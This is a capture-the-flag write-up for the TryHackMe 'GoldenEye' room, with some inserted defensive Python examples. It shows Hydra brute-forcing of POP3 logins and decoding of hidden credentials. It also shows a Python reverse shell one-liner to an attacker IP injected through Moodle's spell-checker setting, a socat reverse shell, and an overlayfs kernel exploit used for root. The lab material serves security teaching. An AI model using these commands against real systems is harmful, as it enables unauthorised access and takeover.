Today we will be doing a James Bond style room on TryHackMe called GoldenEye. Let’s start off by enumerating the box, our first question wants to know how many ports are open.
For this we will use the -p- option to scan all the ports.
We use the -T4 option to scan at the second fastest rate.
Finally, the --reason flag tells us why Nmap thinks a port is open or closed.
nmap -p- -T4 --reason <Target>
We have 4 open ports and 3 filtered ports, so the answer to question 1 is 4.
Now let’s identify the services running on the ports, by specifying the ports we want to scan.
nmap -p25,80,3010,37414,41690,55006,55007 -T4 -sV --reason <IP>
-sV: service version detection.
Looks like port 80 is open, let’s look at the website to see if there’s anything interesting.
The page tells us to login we need to visit /sev-home. After visiting the page it pops up a dialog box and doesn’t let us through, we need to find the password.
We can right click on the web page and then select Inspect Element. Going through the source code doesn’t provide anything exciting, so I wonder if there’s something hidden in the JavaScript files. Click on Debugger and then, under the drop down for the IP address, click on terminal.js.
Great, we have an encoded password hidden in the comments of the JavaScript code. A great online tool for decoding passwords, and other strings, is CyberChef. You give it what is called a recipe and it will decode the input. There’s a recipe called Magic that will attempt different decodings and tell you what the output is.
https://gchq.github.io/CyberChef/
Put the encoded password under Input and then drag Magic into the Recipe column. Under Output we can see it used From_HTML_Entity() to decode the password, which is InvincibleHack3r.
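As an added example (not code from the original post), here is a small Python version of that Magic step: it tries HTML-entity and base64 decoding on each token found inside JavaScript comments and reports whatever decodes to readable text. The JS snippet and the encoded words in it are constructed for the example, not the box's terminal.js.

```python
import base64
import html
import re
from typing import List, Optional, Tuple

# Constructed sample: a JS file with one HTML-entity encoded word and one
# base64 word in its comments (these are not the strings from the box).
JS_SAMPLE = """var prompt = '> ';           // shell prompt
// note to self: password is &#72;&#105;&#100;&#100;&#101;&#110;&#49;
/* old backup key: SGlkZGVuMSE= */
function run(cmd) { return cmd; }
"""

ENTITY_RE = re.compile(r"^(?:&#x?[0-9a-fA-F]+;|&[a-zA-Z]+;)+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
COMMENT_RE = re.compile(r"//(.*)|/\*([\s\S]*?)\*/")

def printable(s: str) -> bool:
    return s != "" and all(32 <= ord(c) < 127 for c in s)

def magic(token: str) -> Optional[Tuple[str, str]]:
    """Try decoders in order, like CyberChef's Magic recipe, and return
    (decoder_name, plaintext) for the first one that yields printable ASCII."""
    token = token.strip()
    if ENTITY_RE.match(token):
        out = html.unescape(token)
        if printable(out):
            return ("From_HTML_Entity", out)
    if B64_RE.match(token) and len(token) % 4 == 0:
        try:
            out = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            out = ""
        if printable(out):           # ordinary English words rarely survive this
            return ("From_Base64", out)
    return None

def scan_js_comments(src: str) -> List[Tuple[str, str, str]]:
    """Run magic() on every whitespace-separated token inside JS comments."""
    hits = []
    for m in COMMENT_RE.finditer(src):
        body = m.group(1) or m.group(2) or ""
        for tok in body.split():
            r = magic(tok)
            if r:
                hits.append((tok, r[0], r[1]))
    return hits
```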
Now let’s try to login to the page located at http://<IP>/sev-home
Remember that the password we decoded was for Boris, so let’s try that username. At first it didn’t work, but that’s because the name is case sensitive, so after using boris with a password of InvincibleHack3r we get logged in!
Now we should try to use our credentials on other services. POP3 is a mail protocol, so maybe we can check Boris’s mail. Earlier we discovered port 55007 was open and its version is Dovecot pop3d. Dovecot is an open source application that allows you to receive emails on a Linux server. Let’s try to establish a connection!
We can use telnet to connect to the port, and we are greeted with GoldenEye POP3 Electronic-Mail System. Now we need to authenticate, so type the following:
user boris
pass InvincibleHack3r
Sadly, it looks like Boris is smart and doesn’t re-use the website password we discovered. Maybe we can brute force his password. This means we will continually try passwords from a wordlist to see if any allow us to log in. Looking at a Hydra cheat sheet, it looks like we can brute force pop3 using the tool. (https://github.com/frizb/Hydra-Cheatsheet)
hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f -V -s 55007 10.10.76.154 pop3
-l: the single username we want to brute force.
-P: the password list we want to use.
-s: lets us specify a port, since the pop3 service is running on a non-standard port.
-f: exit once a valid username and password combination is found. This is good because, since we are only attacking one user, we don’t need to keep trying bad passwords once we find the correct one.
Finally we add in the IP and the protocol we want to brute force, using -V to print each login/password attempt (verbose).
I like to start with the fasttrack wordlist, because it’s much shorter and if it doesn’t work you could move onto something like rockyou. Luckily for this machine we found our credentials!
NOTE: On kali you can find some wordlists under /usr/share/wordlists/
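From the defender's side, the same guessing shows up in Dovecot's logs as a burst of auth failed disconnects from one rip= address, often followed by a Login. This added Python example (not from the original post; the log lines are constructed rather than taken from the box) sums failures per source IP and flags sources that cross a threshold, noting any account that then logged in; the same check covers the later runs against natalya, alec and doak.

```python
import re
from collections import defaultdict
from typing import Dict, List

FAIL_RE = re.compile(r"pop3-login: Disconnected \(auth failed, (\d+) attempts in \d+ secs\): "
                     r"user=<([^>]*)>.*?rip=([\d.]+)")
OK_RE = re.compile(r"pop3-login: Login: user=<([^>]*)>.*?rip=([\d.]+)")

# Constructed Dovecot log excerpt (not from the box): a burst of short connections
# from 203.0.113.5, then a successful login, plus one innocent typo from another host.
SAMPLE_LOG = """\
Jan 10 12:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<boris>, method=PLAIN, rip=203.0.113.5, lip=10.0.0.2
Jan 10 12:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<boris>, method=PLAIN, rip=203.0.113.5, lip=10.0.0.2
Jan 10 12:00:02 mail dovecot: pop3-login: Disconnected (auth failed, 2 attempts in 2 secs): user=<boris>, method=PLAIN, rip=203.0.113.5, lip=10.0.0.2
Jan 10 12:00:02 mail dovecot: pop3-login: Disconnected (auth failed, 2 attempts in 2 secs): user=<boris>, method=PLAIN, rip=203.0.113.5, lip=10.0.0.2
Jan 10 12:00:03 mail dovecot: pop3-login: Login: user=<boris>, method=PLAIN, rip=203.0.113.5, lip=10.0.0.2, mpid=4321
Jan 10 12:05:00 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 4 secs): user=<natalya>, method=PLAIN, rip=198.51.100.7, lip=10.0.0.2
Jan 10 12:05:09 mail dovecot: pop3-login: Login: user=<natalya>, method=PLAIN, rip=198.51.100.7, lip=10.0.0.2, mpid=4322
"""

def analyse(log_text: str, threshold: int = 5) -> Dict[str, dict]:
    """Sum failed POP3 auth attempts per source IP (rip=) and report sources at or
    above the threshold, noting any user that then logged in from that source."""
    failed: Dict[str, int] = defaultdict(int)
    users: Dict[str, set] = defaultdict(set)
    success_after: Dict[str, List[str]] = defaultdict(list)
    for line in log_text.splitlines():
        m = FAIL_RE.search(line)
        if m:
            n, user, rip = int(m.group(1)), m.group(2), m.group(3)
            failed[rip] += n
            users[rip].add(user)
            continue
        m = OK_RE.search(line)
        if m and failed.get(m.group(2), 0) >= threshold:
            # a login after a flood of failures: treat that account as compromised
            success_after[m.group(2)].append(m.group(1))
    return {rip: {"failed": n, "users": sorted(users[rip]),
                  "success_after": success_after[rip]}
            for rip, n in failed.items() if n >= threshold}
```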
So let’s login using telnet, which is the service configured for the port and the answer to our question.
telnet <IP> 55007
user boris
pass secret1!
We can use the LIST command to view a summary of email messages. If we want to read an email, we use the retr command along with the number displayed on the left.
We see an email from natalya@ubuntu, so this may be another account on the machine! We can try to brute force natalya’s password just like we did Boris’s.
There is also an email from alec@janus.boss that discusses codes and says they should be placed in the root directory. We will want to download this email and get the attachment with the codes.
I had some issues downloading attachments, but I can probably brute force alec’s password.
printf 'natalya\nalec\n' > users.txt
Here I wanted a one liner to add our users to brute force (natalya and alec) to a file in a single command. Cat out the file to ensure the 2 names are in users.txt. We use \n between the names for a new line (printf interprets it; a plain echo without -e would write the backslash literally in bash).
hydra -L users.txt -P /usr/share/wordlists/fasttrack.txt -f -V -s 55007 10.10.76.154 pop3
The only change from the previous command is the -L flag, which takes a user list instead of a single username. Additionally I added the -T flag to define the maximum number of threads to be used during the attack.
We were able to brute force natalya’s password and it’s bird.
Let’s read through natalya’s emails.
telnet <target IP> 55007
user natalya
pass bird
list
retr 1
retr 2
The retr command allows us to retrieve the email, we find an email with credentials for xenia and information about the internal Domain: severnaya-station.com/gnocertdir
Now we need to edit the /etc/hosts file to access http://severnaya-station.com. The /etc/hosts file lets us map a domain name to its corresponding IP address. This is used a lot in these kinds of challenges, like TryHackMe and HackTheBox.
nano /etc/hosts
<target IP> severnaya-station.com
Now visit http://severnaya-station.com/gnocertdir in your browser.
On the right side we see that the user for this Moodle platform should be admin.
Turns out the admin is just to distract you, actually use the credentials for xenia given in the email.
At the bottom of the page we have a message from Dr Doak, who is another user.
Maybe we can use doak as a username to the pop3 service.
I added doak to users.txt and then started hydra again.
hydra -T 64 -L users.txt -P /usr/share/wordlists/fasttrack.txt -f -V -s 55007 10.10.219.77 pop3 -I
Finally we crack doak’s password!
Now let’s check Dr. Doak’s email.
telnet <target IP> 55007
user doak
pass goat
list
We see there’s one message so let’s read it.
retr 1
Now we have another user’s password for the website so let’s login there. We have also answered what is the next user you can find from doak? It’s dr_doak
When you login, click on the top right where it says Dr Doak, then click on My private files.
Looks like we have a file for james called s3cret.txt
It looks like someone left us admin credentials located at http://severnaya-station.com/dir007key/for-007.jpg
The page looks uninteresting maybe there’s something hidden in the file? Let’s download it
wget http://severnaya-station.com/dir007key/for-007.jpg
Sometimes people hide information in the Exif data of photos. Exif (exchangeable image file format) defines specific information about an image, and it is possible to embed arbitrary data within pictures. You can even embed code within Exif data, which could allow code execution on a target server where you can upload picture files. We can run the strings command to see if anything sticks out.
strings for-007.jpg
It looks like there is some base64 encoded text, given away by the = sign at the end. Let’s try to decode it.
echo eFdpbnRlcjE5OTV4IQ== | base64 -d
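strings works, but a more targeted check is to parse the JPEG marker segments and look only in the comment (COM) and APP1/Exif segments where text can be embedded. This added Python example (not from the original post; the tiny JPEG and its base64 string are constructed) walks the segments, rejects truncated or malformed headers, and decodes any base64 run that yields printable text.

```python
import base64
import re
B64_RE = re.compile(rb"[A-Za-z0-9+/]{8,}={0,2}")

def jpeg_segments(data):
    """Walk the marker segments before the scan data, yielding (marker, payload)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):      # EOI, or SOS: compressed image data follows
            return
        header = data[pos + 2:pos + 4]
        length = int.from_bytes(header, "big")      # counts the 2 length bytes themselves
        if len(header) < 2 or length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"bad or truncated segment at offset {pos}")
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length

def find_base64_in_metadata(data):
    """Return (marker, token, decoded) for base64 runs inside COM (0xFE) and
    APP1/Exif (0xE1) segments that decode to printable ASCII."""
    hits = []
    for marker, payload in jpeg_segments(data):
        if marker not in (0xFE, 0xE1):
            continue
        for tok in B64_RE.findall(payload):
            if len(tok) % 4:
                continue
            try:
                dec = base64.b64decode(tok, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if dec.isprintable():
                hits.append((marker, tok.decode(), dec))
    return hits

def _segment(marker, payload):
    return bytes([0xFF, marker]) + (len(payload) + 2).to_bytes(2, "big") + payload

# Constructed minimal JPEG (not the box's image): SOI, a JFIF APP0 header,
# a COM segment carrying a base64 string, then EOI.
SAMPLE_JPEG = (b"\xff\xd8"
               + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
               + _segment(0xFE, b"backup key: Q29uc3RydWN0ZWQhMQ==")
               + b"\xff\xd9")
```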
We can now log into the site as Admin with the password xWinter1995x!
With the Admin user we can modify the site. At the bottom we can search and our hint says to use aspell, so search for that.
Let’s see what happens if we pass it a command. I didn’t get anything in the output. Let’s just try a reverse shell, maybe netcat is on the box.
Run this on your attacker machine. This is to set up a listener where your attacker machine will look for incoming connections.
nc -nlvp 1337
Now make this the command for aspell.
nc <Your IP> 1337
I didn’t get a shell, so let’s look for the spell engine settings.
In the bottom search for spell engine. Then change the setting to PSpellShell. This should allow us to use the shell instead of the default of Google Spell.
Now let’s create a blog post and use the spell checker to see if we can get a shell!
Click on My Profile > Blogs > Add a new entry.
Sadly I didn’t get the shell. After trying a few different shells, it turns out python3 is on the machine, so I can use a python3 reverse shell.
The one I used came from https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/os-cmd-execution/reverse-shell-one-liners.doc.txt
Be sure to put in your attacker machine IP address.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKERIP",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
We finally have a shell! I ran whoami and we are www-data, which means we will need to do some privilege escalation. This is because the account running the web server is www-data, which is good security practice. If this web server were run by root, we would automatically have full control of the machine.
I tried to see if this user had any sudo privileges (highly unlikely) by running sudo -l, and it says I don’t have a tty. We can upgrade to a full tty using socat. We could also use python here, but I want to use a different method.
First you need to download the stand-alone socat binaries onto your attacker machine located at https://github.com/andrew-d/static-binaries
If you just want to download the socat binary you can run
wget https://github.com/andrew-d/static-binaries/raw/master/binaries/darwin/socat
Now we need to spin up a python web server so we can download it from our target machine.
Attacker machine
python3 -m http.server 7777
Target machine
wget http://<AttackerIP>:7777/socat; chmod +x socat
I used the semi-colon to run multiple commands, chmod +x makes the binary executable so we can run it.
Now on the Attacker machine you start a socat listener by running
socat file:`tty`,raw,echo=0 tcp-listen:4444
NOTE: the character before and after tty is using the key above the tab key.
Now on your target run this command, replacing with your Attacker IP. This will give us a full tty reverse shell.
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ATTACKERIP>:4444
I ran into a problem: I downloaded the wrong socat binary, which caused me to get the error bash: ./socat: cannot execute binary file: Exec format error. So we need to check the architecture of the machine.
uname -m
It’s x86_64 so the file we actually need is https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
Now when we run it the target machine just idles, which means we should have a new reverse shell!
Now we can run sudo -l, but it asks for the password, which we don’t have, so this isn’t the right way. This would list out any privileges you have with sudo, which can usually lead to privilege escalation.
We can use uname -a to get some information about the system and we can cat out the os-release file for more information.
uname -a
cat /etc/os-release
Looks like the kernel is from 2014, so we may have a kernel level vulnerability. If we Google “Ubuntu 14.04.1 LTS privilege escalation” the first result is about overlayfs from Exploit Database. The information says it works on kernels before 2015-12-26 so it looks like we may have a good exploit! https://www.exploit-db.com/exploits/39166
When we click download we see that this is a C file, so we can download it to our attacker box, transfer it to the target, and compile the code there. You want to compile on the target in case libraries differ between the attacker box and the target box. At first I tried to compile it on my attacker machine, because I couldn’t find a compiler to use on the target machine.
Attacker box
wget https://www.exploit-db.com/download/39166
mv 39166 39166.c
gcc -Wall -save-temps 39166.c -o hack
python3 -m http.server 7777
Target
cd /tmp
wget http://<AttackerIP>:7777/hack
chmod +x hack
./hack
Since we don’t have gcc on the target, we need to compile exploits on our local machine and hope that they work.
I went searching some more and found a blog showing 3 different ways for privilege escalation
https://www.programmersought.com/article/23994556760/
It turns out you do need to compile the exploit on the target machine. So what development tools are on this machine? I wonder if they just renamed gcc to something similar.
find / -name "*cc" 2>/dev/null
We find /usr/bin/cc. I wonder what that is?
/usr/bin/cc -v
Looks like it’s actually gcc, just hidden from us. Since we are now using cc, we need to replace gcc with cc in the system call in our exploit. Modify this on your attacker machine.
Now we can transfer the exploit over to our target, compile it, and finally get a root shell!
Attacker machine
python3 -m http.server 7777
Target
wget http://10.6.43.108:7777/exploit.c
/usr/bin/cc -Wall -save-temps exploit.c -o win
chmod +x win
./win
Finally we have a root shell! Go and grab the root flag!
Well wait the flag isn’t just /root.txt. Let’s go look at the root directory
cd /
ls -lah
Looks like we need to go visit the website again.
Maybe the flag is hidden in the exif data again.
wget http://severnaya-station.com/006-final-xvf7-flag
But this is just an HTML page, the flag is actually the codes above!
I hope you learned a lot from this post, this was a fun box, but it seems highly unstable at times. Good luck and see you in the next post!